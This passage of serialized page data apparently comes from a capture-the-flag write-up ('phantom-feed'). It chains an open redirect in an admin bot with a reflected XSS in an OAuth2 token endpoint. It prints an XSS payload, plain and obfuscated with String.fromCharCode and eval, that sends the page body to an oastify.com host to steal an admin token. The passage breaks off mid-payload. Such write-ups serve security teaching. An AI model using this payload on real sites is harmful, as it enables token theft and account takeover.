tyle":676},[31822],{"type":38,"value":679},{"type":33,"tag":128,"props":31824,"children":31825},{"style":140},[31826],{"type":38,"value":7367},{"type":33,"tag":128,"props":31828,"children":31829},{"style":676},[31830],{"type":38,"value":669},{"type":33,"tag":128,"props":31832,"children":31833},{"style":312},[31834],{"type":38,"value":693},{"type":33,"t
ag":128,"props":31836,"children":31837},{"class":130,"line":1026},[31838,31842,31847,31851,31855,31860,31864,31868,31872,31876,31880,31884,31888,31892,31896,31900,31905,31909,31914,31918,31923,31928,31933],{"type":33,"tag":128,"props":31839,"children":31840},{"style":676},[31841],{"type":38,"value":12732},{"type":33,"tag":128,"props":31843,"children":31844},{"style":140},[31845],{"type":38,"value":31846},"expiry",{"type":33,"tag":128,"props":31848,"children":31849},{"style":676},[31850],{"type":38,"value":669},{"type":33,"tag":128,"props":31852,"children":31853},{"style":312},[31854],{"type":38,"value":284},{"type":33,"tag":128,"props":31856,"children":31857},{"style":437},[31858],{"type":38,"value":31859}," int",{"type":33,"tag":128,"props":31861,"children":31862},{"style":312},[31863],{"type":38,"value":13071},{"type":33,"tag":128,"props":31865,"children":31866},{"style":323},[31867],{"type":38,"value":31262},{"type":33,"tag":128,"props":31869,"children":31870},{"style":312},[31871],{"type":38,"value":215},{"type":33,"tag":128,"props":31873,"children":31874},{"style":323},[31875],{"type":38,"value":31262},{"type":33,"tag":128,"props":31877,"children":31878},{"style":312},[31879],{"type":38,"value":215},{"type":33,"tag":128,"props":31881,"children":31882},{"style":323},[31883],{"type":38,"value":31271},{"type":33,"tag":128,"props":31885,"children":31886},{"style":312},[31887],{"type":38,"value":9376},{"type":33,"tag":128,"props":31889,"children":31890},{"style":300},[31891],{"type":38,"value":8297},{"type":33,"tag":128,"props":31893,"children":31894},{"style":323},[31895],{"type":38,"value":31253},{"type":33,"tag":128,"props":31897,"children":31898},{"style":312},[31899],{"type":38,"value":215},{"type":33,"tag":128,"props":31901,"children":31902},{"style":323},[31903],{"type":38,"value":31904},"timedelta",{"type":33,"tag":128,"props":31906,"children":31907},{"style":312},[31908],{"type":38,"value":5566},{"type":33,"tag":128,"props":31910,"children":31911},{"style":
306},[31912],{"type":38,"value":31913},"seconds",{"type":33,"tag":128,"props":31915,"children":31916},{"style":312},[31917],{"type":38,"value":315},{"type":33,"tag":128,"props":31919,"children":31920},{"style":523},[31921],{"type":38,"value":31922},"1800",{"type":33,"tag":128,"props":31924,"children":31925},{"style":312},[31926],{"type":38,"value":31927},")).",{"type":33,"tag":128,"props":31929,"children":31930},{"style":323},[31931],{"type":38,"value":31932},"timestamp",{"type":33,"tag":128,"props":31934,"children":31935},{"style":312},[31936],{"type":38,"value":31937},"()),\n",{"type":33,"tag":128,"props":31939,"children":31940},{"class":130,"line":1038},[31941,31945,31950,31954,31958,31962],{"type":33,"tag":128,"props":31942,"children":31943},{"style":676},[31944],{"type":38,"value":12732},{"type":33,"tag":128,"props":31946,"children":31947},{"style":140},[31948],{"type":38,"value":31949},"secure",{"type":33,"tag":128,"props":31951,"children":31952},{"style":676},[31953],{"type":38,"value":669},{"type":33,"tag":128,"props":31955,"children":31956},{"style":312},[31957],{"type":38,"value":284},{"type":33,"tag":128,"props":31959,"children":31960},{"style":1576},[31961],{"type":38,"value":30269},{"type":33,"tag":128,"props":31963,"children":31964},{"style":312},[31965],{"type":38,"value":693},{"type":33,"tag":128,"props":31967,"children":31968},{"class":130,"line":1051},[31969,31973,31978,31982,31986],{"type":33,"tag":128,"props":31970,"children":31971},{"style":676},[31972],{"type":38,"value":12732},{"type":33,"tag":128,"props":31974,"children":31975},{"style":140},[31976],{"type":38,"value":31977},"httpOnly",{"type":33,"tag":128,"props":31979,"children":31980},{"style":676},[31981],{"type":38,"value":669},{"type":33,"tag":128,"props":31983,"children":31984},{"style":312},[31985],{"type":38,"value":284},{"type":33,"tag":128,"props":31987,"children":31988},{"style":1576},[31989],{"type":38,"value":31990}," 
True\n",{"type":33,"tag":128,"props":31992,"children":31993},{"class":130,"line":1063},[31994],{"type":33,"tag":128,"props":31995,"children":31996},{"style":312},[31997],{"type":38,"value":6760},{"type":33,"tag":128,"props":31999,"children":32000},{"class":130,"line":1076},[32001,32005,32009,32014,32018,32023],{"type":33,"tag":128,"props":32002,"children":32003},{"style":323},[32004],{"type":38,"value":31599},{"type":33,"tag":128,"props":32006,"children":32007},{"style":312},[32008],{"type":38,"value":215},{"type":33,"tag":128,"props":32010,"children":32011},{"style":323},[32012],{"type":38,"value":32013},"add_cookie",{"type":33,"tag":128,"props":32015,"children":32016},{"style":312},[32017],{"type":38,"value":5566},{"type":33,"tag":128,"props":32019,"children":32020},{"style":323},[32021],{"type":38,"value":32022},"cookie",{"type":33,"tag":128,"props":32024,"children":32025},{"style":312},[32026],{"type":38,"value":2427},{"type":33,"tag":128,"props":32028,"children":32029},{"class":130,"line":1089},[32030],{"type":33,"tag":128,"props":32031,"children":32032},{"emptyLinePlaceholder":896},[32033],{"type":38,"value":899},{"type":33,"tag":128,"props":32035,"children":32036},{"class":130,"line":1101},[32037,32041,32045,32049,32053,32057,32061,32065,32069,32074,32078],{"type":33,"tag":128,"props":32038,"children":32039},{"style":323},[32040],{"type":38,"value":31599},{"type":33,"tag":128,"props":32042,"children":32043},{"style":312},[32044],{"type":38,"value":215},{"type":33,"tag":128,"props":32046,"children":32047},{"style":323},[32048],{"type":38,"value":13526},{"type":33,"tag":128,"props":32050,"children":32051},{"style":312},[32052],{"type":38,"value":5566},{"type":33,"tag":128,"props":32054,"children":32055},{"style":676},[32056],{"type":38,"value":669},{"type":33,"tag":128,"props":32058,"children":32059},{"style":140},[32060],{"type":38,"value":31620},{"type":33,"tag":128,"props":32062,"children":32063},{"style":676},[32064],{"type":38,"value":669},{"type":33,"tag"
:128,"props":32066,"children":32067},{"style":300},[32068],{"type":38,"value":8297},{"type":33,"tag":128,"props":32070,"children":32071},{"style":323},[32072],{"type":38,"value":32073}," link",{"type":33,"tag":128,"props":32075,"children":32076},{"style":312},[32077],{"type":38,"value":2966},{"type":33,"tag":128,"props":32079,"children":32080},{"style":5541},[32081],{"type":38,"value":32082}," # \u003C--- Here is the open redirect\n",{"type":33,"tag":128,"props":32084,"children":32085},{"class":130,"line":1114},[32086,32091,32095,32100,32104,32109],{"type":33,"tag":128,"props":32087,"children":32088},{"style":323},[32089],{"type":38,"value":32090},"    time",{"type":33,"tag":128,"props":32092,"children":32093},{"style":312},[32094],{"type":38,"value":215},{"type":33,"tag":128,"props":32096,"children":32097},{"style":323},[32098],{"type":38,"value":32099},"sleep",{"type":33,"tag":128,"props":32101,"children":32102},{"style":312},[32103],{"type":38,"value":5566},{"type":33,"tag":128,"props":32105,"children":32106},{"style":523},[32107],{"type":38,"value":32108},"10",{"type":33,"tag":128,"props":32110,"children":32111},{"style":312},[32112],{"type":38,"value":2427},{"type":33,"tag":128,"props":32114,"children":32115},{"class":130,"line":1127},[32116,32120,32124,32129],{"type":33,"tag":128,"props":32117,"children":32118},{"style":323},[32119],{"type":38,"value":31599},{"type":33,"tag":128,"props":32121,"children":32122},{"style":312},[32123],{"type":38,"value":215},{"type":33,"tag":128,"props":32125,"children":32126},{"style":323},[32127],{"type":38,"value":32128},"quit",{"type":33,"tag":128,"props":32130,"children":32131},{"style":312},[32132],{"type":38,"value":7857},{"type":33,"tag":47,"props":32134,"children":32135},{},[32136],{"type":38,"value":32137},"Furthermore, it is important to note that this bot has an administrator token in its cookie. However, this token can only be used on the service on port 3000. 
We need to find a way to have a valid token on port 4000. This is what we will detail in the next chapter.",{"type":33,"tag":40,"props":32139,"children":32141},{"id":32140},"oauth2-into-xss",[32142],{"type":38,"value":32143},"Oauth2 into XSS",{"type":33,"tag":47,"props":32145,"children":32146},{},[32147,32149,32155],{"type":38,"value":32148},"The routes of the port service 4000 are only accessible via the header ",{"type":33,"tag":105,"props":32150,"children":32152},{"className":32151},[],[32153],{"type":38,"value":32154},"Authorization: Bearer \u003CJWT>",{"type":38,"value":32156},". The JWT must be generated beforehand using the oauth2 functionality located on port 3000.",{"type":33,"tag":47,"props":32158,"children":32159},{},[32160],{"type":38,"value":32161},"We will detail these routes below:",{"type":33,"tag":239,"props":32163,"children":32164},{},[32165],{"type":33,"tag":243,"props":32166,"children":32167},{},[32168,32174,32175,32179,32184,32186,32189,32194,32196,32199,32204],{"type":33,"tag":105,"props":32169,"children":32171},{"className":32170},[],[32172],{"type":38,"value":32173},"/oauth2/auth",{"type":38,"value":284},{"type":33,"tag":32176,"props":32177,"children":32178},"br",{},[],{"type":33,"tag":2572,"props":32180,"children":32181},{},[32182],{"type":38,"value":32183},"Method",{"type":38,"value":32185},": GET",{"type":33,"tag":32176,"props":32187,"children":32188},{},[],{"type":33,"tag":2572,"props":32190,"children":32191},{},[32192],{"type":38,"value":32193},"Parameters",{"type":38,"value":32195},": client_id, redirect_url",{"type":33,"tag":32176,"props":32197,"children":32198},{},[],{"type":33,"tag":2572,"props":32200,"children":32201},{},[32202],{"type":38,"value":32203},"Description",{"type":38,"value":32205},": This route generates an OAuth2 authorization page using the \"oauth2.html\" template. It passes in the title, client_id, and redirect_url as variables to the template. 
This page is likely where the user would enter their credentials to authorize the OAuth2 request.",{"type":33,"tag":34,"props":32207,"children":32208},{"id":8},[],{"type":33,"tag":239,"props":32210,"children":32211},{},[32212],{"type":33,"tag":243,"props":32213,"children":32214},{},[32215,32221,32222,32225,32229,32230,32233,32237,32238,32241,32245],{"type":33,"tag":105,"props":32216,"children":32218},{"className":32217},[],[32219],{"type":38,"value":32220},"oauth2/code",{"type":38,"value":284},{"type":33,"tag":32176,"props":32223,"children":32224},{},[],{"type":33,"tag":2572,"props":32226,"children":32227},{},[32228],{"type":38,"value":32183},{"type":38,"value":32185},{"type":33,"tag":32176,"props":32231,"children":32232},{},[],{"type":33,"tag":2572,"props":32234,"children":32235},{},[32236],{"type":38,"value":32193},{"type":38,"value":32195},{"type":33,"tag":32176,"props":32239,"children":32240},{},[],{"type":33,"tag":2572,"props":32242,"children":32243},{},[32244],{"type":38,"value":32203},{"type":38,"value":32246},": This route constructs a URL containing the authorization code as a query parameter and redirects the user to this URL using a 303 status code. This is typically the URL of the client application that initiated the OAuth2 request. 
The client application can then use this authorization code to request an access token from the server.",{"type":33,"tag":34,"props":32248,"children":32250},{"id":32249},"_1",[],{"type":33,"tag":239,"props":32252,"children":32253},{},[32254],{"type":33,"tag":243,"props":32255,"children":32256},{},[32257,32263,32264,32267,32271,32272,32275,32279,32281,32284,32288,32290,32294,32297,32302],{"type":33,"tag":105,"props":32258,"children":32260},{"className":32259},[],[32261],{"type":38,"value":32262},"/oauth2/token",{"type":38,"value":284},{"type":33,"tag":32176,"props":32265,"children":32266},{},[],{"type":33,"tag":2572,"props":32268,"children":32269},{},[32270],{"type":38,"value":32183},{"type":38,"value":32185},{"type":33,"tag":32176,"props":32273,"children":32274},{},[],{"type":33,"tag":2572,"props":32276,"children":32277},{},[32278],{"type":38,"value":32193},{"type":38,"value":32280},": client_id, redirect_url, authorization_code",{"type":33,"tag":32176,"props":32282,"children":32283},{},[],{"type":33,"tag":2572,"props":32285,"children":32286},{},[32287],{"type":38,"value":32203},{"type":38,"value":32289},": This route checks the validity of the provided authorization code. It retrieves the associated record from the database, verifies the client_id and redirect_url, and checks if the authorization code has expired. 
If the authorization code is valid, it generates an access token and returns it to the client.",{"type":33,"tag":34,"props":32291,"children":32293},{"id":32292},"_2",[],{"type":33,"tag":32176,"props":32295,"children":32296},{},[],{"type":33,"tag":2302,"props":32298,"children":32299},{},[32300],{"type":38,"value":32301},"Note: The client_id and redirect_url parameters need to match the values used to generate the authorization code.",{"type":33,"tag":34,"props":32303,"children":32305},{"id":32304},"_3",[],{"type":33,"tag":47,"props":32307,"children":32308},{},[32309,32311,32317,32319,32324],{"type":38,"value":32310},"If we recap, the routes that interest us are the last two. The flow that allows us to obtain a token for the service on port 4000 is as follows: we call the ",{"type":33,"tag":105,"props":32312,"children":32314},{"className":32313},[],[32315],{"type":38,"value":32316},"/oauth2/code",{"type":38,"value":32318}," route to initialize the oauth2 request; this route returns a 303 with the authorization code as a query parameter. 
Then we call the ",{"type":33,"tag":105,"props":32320,"children":32322},{"className":32321},[],[32323],{"type":38,"value":32262},{"type":38,"value":32325}," route with the authorization code to obtain a valid token.",{"type":33,"tag":47,"props":32327,"children":32328},{},[32329],{"type":38,"value":32330},"oauth2/code:",{"type":33,"tag":75,"props":32332,"children":32334},{"imgSrc":32333},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704313648/writeups/phantom-feed/oauth2_code.webp",[],{"type":33,"tag":47,"props":32336,"children":32337},{},[32338],{"type":38,"value":32339},"oauth2/token:",{"type":33,"tag":75,"props":32341,"children":32343},{"imgSrc":32342},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704313664/writeups/phantom-feed/oauth2_token.webp",[],{"type":33,"tag":47,"props":32345,"children":32346},{},[32347,32349,32355,32357,32363],{"type":38,"value":32348},"If we carefully examine the headers of the last request, we can see that the content type is: ",{"type":33,"tag":105,"props":32350,"children":32352},{"className":32351},[],[32353],{"type":38,"value":32354},"text/html",{"type":38,"value":32356},". Furthermore, the ",{"type":33,"tag":105,"props":32358,"children":32360},{"className":32359},[],[32361],{"type":38,"value":32362},"redirect_url",{"type":38,"value":32364}," is a parameter that we control and we can see that it is reflected in the response, indicating that this endpoint is vulnerable to XSS.",{"type":33,"tag":75,"props":32366,"children":32368},{"imgSrc":32367},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704313866/writeups/phantom-feed/content_type_response_token.webp",[],{"type":33,"tag":47,"props":32370,"children":32371},{},[32372],{"type":38,"value":32373},"In our case, it would be interesting to manipulate the bot by using an open redirect to force it to utilize this OAuth2 flow. 
By exploiting the XSS vulnerability when the token is generated and obtaining the HTML body, we can steal the admin token that is usable in the service at port 4000.",{"type":33,"tag":47,"props":32375,"children":32376},{},[32377],{"type":38,"value":32378},"To do this, we will use the following XSS payload to steal the body of the HTML:",{"type":33,"tag":114,"props":32380,"children":32381},{"lang":5929},[32382],{"type":33,"tag":119,"props":32383,"children":32385},{"className":5933,"code":32384,"language":5929,"meta":8,"style":8},"\u003Cimg src=x onerror='window.location = `http://lc1azv4ne9wwxnmfx2bzw6zdj4p2dt1i.oastify.com/?body=${btoa(document.body.innerHTML)}`'>\n",[32386],{"type":33,"tag":105,"props":32387,"children":32388},{"__ignoreMap":8},[32389],{"type":33,"tag":128,"props":32390,"children":32391},{"class":130,"line":131},[32392,32396,32401,32405,32409,32414,32419,32423,32427,32432,32436,32441,32445,32449,32454,32459,32463],{"type":33,"tag":128,"props":32393,"children":32394},{"style":312},[32395],{"type":38,"value":5977},{"type":33,"tag":128,"props":32397,"children":32398},{"style":1576},[32399],{"type":38,"value":32400},"img",{"type":33,"tag":128,"props":32402,"children":32403},{"style":306},[32404],{"type":38,"value":15069},{"type":33,"tag":128,"props":32406,"children":32407},{"style":312},[32408],{"type":38,"value":315},{"type":33,"tag":128,"props":32410,"children":32411},{"style":140},[32412],{"type":38,"value":32413},"x",{"type":33,"tag":128,"props":32415,"children":32416},{"style":306},[32417],{"type":38,"value":32418}," 
onerror",{"type":33,"tag":128,"props":32420,"children":32421},{"style":312},[32422],{"type":38,"value":315},{"type":33,"tag":128,"props":32424,"children":32425},{"style":676},[32426],{"type":38,"value":6040},{"type":33,"tag":128,"props":32428,"children":32429},{"style":140},[32430],{"type":38,"value":32431},"window",{"type":33,"tag":128,"props":32433,"children":32434},{"style":312},[32435],{"type":38,"value":215},{"type":33,"tag":128,"props":32437,"children":32438},{"style":140},[32439],{"type":38,"value":32440},"location ",{"type":33,"tag":128,"props":32442,"children":32443},{"style":312},[32444],{"type":38,"value":315},{"type":33,"tag":128,"props":32446,"children":32447},{"style":676},[32448],{"type":38,"value":5710},{"type":33,"tag":128,"props":32450,"children":32451},{"style":140},[32452],{"type":38,"value":32453},"http:",{"type":33,"tag":128,"props":32455,"children":32456},{"style":5541},[32457],{"type":38,"value":32458},"//lc1azv4ne9wwxnmfx2bzw6zdj4p2dt1i.oastify.com/?body=${btoa(document.body.innerHTML)}`",{"type":33,"tag":128,"props":32460,"children":32461},{"style":676},[32462],{"type":38,"value":6040},{"type":33,"tag":128,"props":32464,"children":32465},{"style":312},[32466],{"type":38,"value":6097},{"type":33,"tag":47,"props":32468,"children":32469},{},[32470],{"type":38,"value":32471},"To ensure that the script is executed correctly, we will encode our payload with String.fromCharCode.",{"type":33,"tag":114,"props":32473,"children":32474},{"lang":5929},[32475],{"type":33,"tag":119,"props":32476,"children":32478},{"className":5933,"code":32477,"language":5929,"meta":8,"style":8},"\u003Cimg src=x 
onerror='eval(String.fromCharCode(119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,32,61,32,96,104,116,116,112,58,47,47,108,99,49,97,122,118,52,110,101,57,119,119,120,110,109,102,120,50,98,122,119,54,122,100,106,52,112,50,100,116,49,105,46,111,97,115,116,105,102,121,46,99,111,109,47,63,98,111,100,121,61,36,123,98,116,111,97,40,100,111,99,117,109,101,110,116,46,98,111,100,121,46,105,110,110,101,114,72,84,77,76,41,125,96))'>\n",[32479],{"type":33,"tag":105,"props":32480,"children":32481},{"__ignoreMap":8},[32482],{"type":33,"tag":128,"props":32483,"children":32484},{"class":130,"line":131},[32485,32489,32493,32497,32501,32505,32509,32513,32517,32522,32526,32530,32534,32539,32543,32548,32552,32557,32561,32566,32570,32575,32579,32584,32588,32592,32596,32601,32605,32610,32614,32618,32622,32627,32631,32636,32640,32645,32649,32653,32657,32661,32665,32669,32673,32677,32681,32686,32690,32694,32698,32703,32707,32712,32716,32720,32724,32728,32732,32737,32741,32746,32750,32755,32759,32763,32767,32771,32775,32779,32783,32788,32792,32796,32800,32805,32809,32814,32818,32823,32827,32831,32835,32840,32844,32849,32853,32857,32861,32865,32869,32874,32878,32882,32886,32891,32895,32900,32904,32908,32912,32917,32921,32926,32930,32934,32938,32942,32946,32951,32955,32959,32963,32967,32971,32976,32980,32984,32988,32992,32996,33000,33004,33008,33012,33016,33020,33024,33028,33032,33036,33040,33044,33048,33052,33056,33060,33065,33069,33073,33077,33081,33085,33089,33093,33098,33102,33106,33110,33114,33118,33122,33126,33130,33134,33138,33142,33147,33151,33155,33159,33163,33167,33171,33175,33179,33183,33187,33191,33196,33200,33205,33209,33213,33217,33221,33225,33229,33233,33237,33241,33246,33250,33254,33258,33262,33266,33270,33274,33279,33283,33287,33291,33295,33299,33303,33307,33311,33315,33319,33323,33327,33331,33335,33339,33343,33347,33351,33355,33359,33363,33367,33371,33375,33379,33383,33387,33391,33395,33400,33404,33409,33413,33418,33422,33427,33431,33436,33440,33445,33449,33454,3345
8,33462,33466,33470],{"type":33,"tag":128,"props":32486,"children":32487},{"style":312},[32488],{"type":38,"value":5977},{"type":33,"tag":128,"props":32490,"children":32491},{"style":1576},[32492],{"type":38,"value":32400},{"type":33,"tag":128,"props":32494,"children":32495},{"style":306},[32496],{"type":38,"value":15069},{"type":33,"tag":128,"props":32498,"children":32499},{"style":312},[32500],{"type":38,"value":315},{"type":33,"tag":128,"props":32502,"children":32503},{"style":140},[32504],{"type":38,"value":32413},{"type":33,"tag":128,"props":32506,"children":32507},{"style":306},[32508],{"type":38,"value":32418},{"type":33,"tag":128,"props":32510,"children":32511},{"style":312},[32512],{"type":38,"value":315},{"type":33,"tag":128,"props":32514,"children":32515},{"style":676},[32516],{"type":38,"value":6040},{"type":33,"tag":128,"props":32518,"children":32519},{"style":135},[32520],{"type":38,"value":32521},"eval",{"type":33,"tag":128,"props":32523,"children":32524},{"style":312},[32525],{"type":38,"value":5566},{"type":33,"tag":128,"props":32527,"children":32528},{"style":140},[32529],{"type":38,"value":25569},{"type":33,"tag":128,"props":32531,"children":32532},{"style":312},[32533],{"type":38,"value":215},{"type":33,"tag":128,"props":32535,"children":32536},{"style":135},[32537],{"type":38,"value":32538},"fromCharCode",{"type":33,"tag":128,"props":32540,"children":32541},{"style":312},[32542],{"type":38,"value":5566},{"type":33,"tag":128,"props":32544,"children":32545},{"style":523},[32546],{"type":38,"value":32547},"119",{"type":33,"tag":128,"props":32549,"children":32550},{"style":312},[32551],{"type":38,"value":5584},{"type":33,"tag":128,"props":32553,"children":32554},{"style":523},[32555],{"type":38,"value":32556},"105",{"type":33,"tag":128,"props":32558,"children":32559},{"style":312},[32560],{"type":38,"value":5584},{"type":33,"tag":128,"props":32562,"children":32563},{"style":523},[32564],{"type":38,"value":32565},"110",{"type":33,"tag":128,"props":32
567,"children":32568},{"style":312},[32569],{"type":38,"value":5584},{"type":33,"tag":128,"props":32571,"children":32572},{"style":523},[32573],{"type":38,"value":32574},"100",{"type":33,"tag":128,"props":32576,"children":32577},{"style":312},[32578],{"type":38,"value":5584},{"type":33,"tag":128,"props":32580,"children":32581},{"style":523},[32582],{"type":38,"value":32583},"111",{"type":33,"tag":128,"props":32585,"children":32586},{"style":312},[32587],{"type":38,"value":5584},{"type":33,"tag":128,"props":32589,"children":32590},{"style":523},[32591],{"type":38,"value":32547},{"type":33,"tag":128,"props":32593,"children":32594},{"style":312},[32595],{"type":38,"value":5584},{"type":33,"tag":128,"props":32597,"children":32598},{"style":523},[32599],{"type":38,"value":32600},"46",{"type":33,"tag":128,"props":32602,"children":32603},{"style":312},[32604],{"type":38,"value":5584},{"type":33,"tag":128,"props":32606,"children":32607},{"style":523},[32608],{"type":38,"value":32609},"108",{"type":33,"tag":128,"props":32611,"children":32612},{"style":312},[32613],{"type":38,"value":5584},{"type":33,"tag":128,"props":32615,"children":32616},{"style":523},[32617],{"type":38,"value":32583},{"type":33,"tag":128,"props":32619,"children":32620},{"style":312},[32621],{"type":38,"value":5584},{"type":33,"tag":128,"props":32623,"children":32624},{"style":523},[32625],{"type":38,"value":32626},"99",{"type":33,"tag":128,"props":32628,"children":32629},{"style":312},[32630],{"type":38,"value":5584},{"type":33,"tag":128,"props":32632,"children":32633},{"style":523},[32634],{"type":38,"value":32635},"97",{"type":33,"tag":128,"props":32637,"children":32638},{"style":312},[32639],{"type":38,"value":5584},{"type":33,"tag":128,"props":32641,"children":32642},{"style":523},[32643],{"type":38,"value":32644},"116",{"type":33,"tag":128,"props":32646,"children":32647},{"style":312},[32648],{"type":38,"value":5584},{"type":33,"tag":128,"props":32650,"children":32651},{"style":523},[32652],{"type":
38,"value":32556},{"type":33,"tag":128,"props":32654,"children":32655},{"style":312},[32656],{"type":38,"value":5584},{"type":33,"tag":128,"props":32658,"children":32659},{"style":523},[32660],{"type":38,"value":32583},{"type":33,"tag":128,"props":32662,"children":32663},{"style":312},[32664],{"type":38,"value":5584},{"type":33,"tag":128,"props":32666,"children":32667},{"style":523},[32668],{"type":38,"value":32565},{"type":33,"tag":128,"props":32670,"children":32671},{"style":312},[32672],{"type":38,"value":5584},{"type":33,"tag":128,"props":32674,"children":32675},{"style":523},[32676],{"type":38,"value":12334},{"type":33,"tag":128,"props":32678,"children":32679},{"style":312},[32680],{"type":38,"value":5584},{"type":33,"tag":128,"props":32682,"children":32683},{"style":523},[32684],{"type":38,"value":32685},"61",{"type":33,"tag":128,"props":32687,"children":32688},{"style":312},[32689],{"type":38,"value":5584},{"type":33,"tag":128,"props":32691,"children":32692},{"style":523},[32693],{"type":38,"value":12334},{"type":33,"tag":128,"props":32695,"children":32696},{"style":312},[32697],{"type":38,"value":5584},{"type":33,"tag":128,"props":32699,"children":32700},{"style":523},[32701],{"type":38,"value":32702},"96",{"type":33,"tag":128,"props":32704,"children":32705},{"style":312},[32706],{"type":38,"value":5584},{"type":33,"tag":128,"props":32708,"children":32709},{"style":523},[32710],{"type":38,"value":32711},"104",{"type":33,"tag":128,"props":32713,"children":32714},{"style":312},[32715],{"type":38,"value":5584},{"type":33,"tag":128,"props":32717,"children":32718},{"style":523},[32719],{"type":38,"value":32644},{"type":33,"tag":128,"props":32721,"children":32722},{"style":312},[32723],{"type":38,"value":5584},{"type":33,"tag":128,"props":32725,"children":32726},{"style":523},[32727],{"type":38,"value":32644},{"type":33,"tag":128,"props":32729,"children":32730},{"style":312},[32731],{"type":38,"value":5584},{"type":33,"tag":128,"props":32733,"children":32734},{"st
yle":523},[32735],{"type":38,"value":32736},"112",{"type":33,"tag":128,"props":32738,"children":32739},{"style":312},[32740],{"type":38,"value":5584},{"type":33,"tag":128,"props":32742,"children":32743},{"style":523},[32744],{"type":38,"value":32745},"58",{"type":33,"tag":128,"props":32747,"children":32748},{"style":312},[32749],{"type":38,"value":5584},{"type":33,"tag":128,"props":32751,"children":32752},{"style":523},[32753],{"type":38,"value":32754},"47",{"type":33,"tag":128,"props":32756,"children":32757},{"style":312},[32758],{"type":38,"value":5584},{"type":33,"tag":128,"props":32760,"children":32761},{"style":523},[32762],{"type":38,"value":32754},{"type":33,"tag":128,"props":32764,"children":32765},{"style":312},[32766],{"type":38,"value":5584},{"type":33,"tag":128,"props":32768,"children":32769},{"style":523},[32770],{"type":38,"value":32609},{"type":33,"tag":128,"props":32772,"children":32773},{"style":312},[32774],{"type":38,"value":5584},{"type":33,"tag":128,"props":32776,"children":32777},{"style":523},[32778],{"type":38,"value":32626},{"type":33,"tag":128,"props":32780,"children":32781},{"style":312},[32782],{"type":38,"value":5584},{"type":33,"tag":128,"props":32784,"children":32785},{"style":523},[32786],{"type":38,"value":32787},"49",{"type":33,"tag":128,"props":32789,"children":32790},{"style":312},[32791],{"type":38,"value":5584},{"type":33,"tag":128,"props":32793,"children":32794},{"style":523},[32795],{"type":38,"value":32635},{"type":33,"tag":128,"props":32797,"children":32798},{"style":312},[32799],{"type":38,"value":5584},{"type":33,"tag":128,"props":32801,"children":32802},{"style":523},[32803],{"type":38,"value":32804},"122",{"type":33,"tag":128,"props":32806,"children":32807},{"style":312},[32808],{"type":38,"value":5584},{"type":33,"tag":128,"props":32810,"children":32811},{"style":523},[32812],{"type":38,"value":32813},"118",{"type":33,"tag":128,"props":32815,"children":32816},{"style":312},[32817],{"type":38,"value":5584},{"type":33,"ta
g":128,"props":32819,"children":32820},{"style":523},[32821],{"type":38,"value":32822},"52",{"type":33,"tag":128,"props":32824,"children":32825},{"style":312},[32826],{"type":38,"value":5584},{"type":33,"tag":128,"props":32828,"children":32829},{"style":523},[32830],{"type":38,"value":32565},{"type":33,"tag":128,"props":32832,"children":32833},{"style":312},[32834],{"type":38,"value":5584},{"type":33,"tag":128,"props":32836,"children":32837},{"style":523},[32838],{"type":38,"value":32839},"101",{"type":33,"tag":128,"props":32841,"children":32842},{"style":312},[32843],{"type":38,"value":5584},{"type":33,"tag":128,"props":32845,"children":32846},{"style":523},[32847],{"type":38,"value":32848},"57",{"type":33,"tag":128,"props":32850,"children":32851},{"style":312},[32852],{"type":38,"value":5584},{"type":33,"tag":128,"props":32854,"children":32855},{"style":523},[32856],{"type":38,"value":32547},{"type":33,"tag":128,"props":32858,"children":32859},{"style":312},[32860],{"type":38,"value":5584},{"type":33,"tag":128,"props":32862,"children":32863},{"style":523},[32864],{"type":38,"value":32547},{"type":33,"tag":128,"props":32866,"children":32867},{"style":312},[32868],{"type":38,"value":5584},{"type":33,"tag":128,"props":32870,"children":32871},{"style":523},[32872],{"type":38,"value":32873},"120",{"type":33,"tag":128,"props":32875,"children":32876},{"style":312},[32877],{"type":38,"value":5584},{"type":33,"tag":128,"props":32879,"children":32880},{"style":523},[32881],{"type":38,"value":32565},{"type":33,"tag":128,"props":32883,"children":32884},{"style":312},[32885],{"type":38,"value":5584},{"type":33,"tag":128,"props":32887,"children":32888},{"style":523},[32889],{"type":38,"value":32890},"109",{"type":33,"tag":128,"props":32892,"children":32893},{"style":312},[32894],{"type":38,"value":5584},{"type":33,"tag":128,"props":32896,"children":32897},{"style":523},[32898],{"type":38,"value":32899},"102",{"type":33,"tag":128,"props":32901,"children":32902},{"style":312},[32
903],{"type":38,"value":5584},{"type":33,"tag":128,"props":32905,"children":32906},{"style":523},[32907],{"type":38,"value":32873},{"type":33,"tag":128,"props":32909,"children":32910},{"style":312},[32911],{"type":38,"value":5584},{"type":33,"tag":128,"props":32913,"children":32914},{"style":523},[32915],{"type":38,"value":32916},"50",{"type":33,"tag":128,"props":32918,"children":32919},{"style":312},[32920],{"type":38,"value":5584},{"type":33,"tag":128,"props":32922,"children":32923},{"style":523},[32924],{"type":38,"value":32925},"98",{"type":33,"tag":128,"props":32927,"children":32928},{"style":312},[32929],{"type":38,"value":5584},{"type":33,"tag":128,"props":32931,"children":32932},{"style":523},[32933],{"type":38,"value":32804},{"type":33,"tag":128,"props":32935,"children":32936},{"style":312},[32937],{"type":38,"value":5584},{"type":33,"tag":128,"props":32939,"children":32940},{"style":523},[32941],{"type":38,"value":32547},{"type":33,"tag":128,"props":32943,"children":32944},{"style":312},[32945],{"type":38,"value":5584},{"type":33,"tag":128,"props":32947,"children":32948},{"style":523},[32949],{"type":38,"value":32950},"54",{"type":33,"tag":128,"props":32952,"children":32953},{"style":312},[32954],{"type":38,"value":5584},{"type":33,"tag":128,"props":32956,"children":32957},{"style":523},[32958],{"type":38,"value":32804},{"type":33,"tag":128,"props":32960,"children":32961},{"style":312},[32962],{"type":38,"value":5584},{"type":33,"tag":128,"props":32964,"children":32965},{"style":523},[32966],{"type":38,"value":32574},{"type":33,"tag":128,"props":32968,"children":32969},{"style":312},[32970],{"type":38,"value":5584},{"type":33,"tag":128,"props":32972,"children":32973},{"style":523},[32974],{"type":38,"value":32975},"106",{"type":33,"tag":128,"props":32977,"children":32978},{"style":312},[32979],{"type":38,"value":5584},{"type":33,"tag":128,"props":32981,"children":32982},{"style":523},[32983],{"type":38,"value":32822},{"type":33,"tag":128,"props":32985,"chi
